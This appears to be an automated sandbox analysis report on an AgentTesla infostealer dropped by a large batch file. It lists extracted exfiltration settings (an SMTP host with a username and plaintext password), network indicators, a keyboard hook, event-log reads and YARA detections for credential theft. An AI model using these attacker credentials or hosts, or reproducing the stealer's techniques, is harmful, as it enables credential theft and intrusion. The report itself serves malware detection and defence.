                    Source: 8.2.InstallUtil.exe.380000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D7A000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000056C4000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E1D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D7A000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000056C4000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E1D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: powershell.pdbUGP source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230623116.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, ChannelUris.bat.Zhe, 00000013.00000000.2381194622.0000000000248000.00000020.00000001.01000000.00000009.sdmp, ChannelUris.bat.Zhe.17.dr, 87M9Y3P4Z7.bat.Zhe.5.dr
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: powershell.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230623116.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, ChannelUris.bat.Zhe, 00000013.00000000.2381194622.0000000000248000.00000020.00000001.01000000.00000009.sdmp, ChannelUris.bat.Zhe.17.dr, 87M9Y3P4Z7.bat.Zhe.5.dr
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_089BD340
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h19_2_093AD340

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.6:49757 -> 163.44.198.71:587
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 163.44.198.71 163.44.198.71
                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                    Source: Joe Sandbox ViewASN Name: GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.6:49757 -> 163.44.198.71:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: nffplp.com
                    Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059BF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2411444957.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2281586637.0000000006DD4000.00000004.00000020.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2281586637.0000000006D4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0
                    Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#
                    Source: InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/cPan/
                    Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#
                    Source: InstallUtil.exe, 00000008.00000002.2417476771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2413879182.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4698691808.000000000096E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.000000000276E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nffplp.com
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000005908000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059BF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005122000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2472138860.00000000077E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005122000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2472138860.00000000077E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000004FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005122000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2472138860.00000000077E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000005908000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Reads the Security eventlog
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Reads the System eventlog
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Found large BAT file
                    Source: 87M9Y3P4Z7.batStatic file information: 1410688
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_028BF4E07_2_028BF4E0
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_028BB7667_2_028BB766
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_088C85D67_2_088C85D6
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_088CC6D07_2_088CC6D0
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_088CD8D87_2_088CD8D8
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_088C00117_2_088C0011
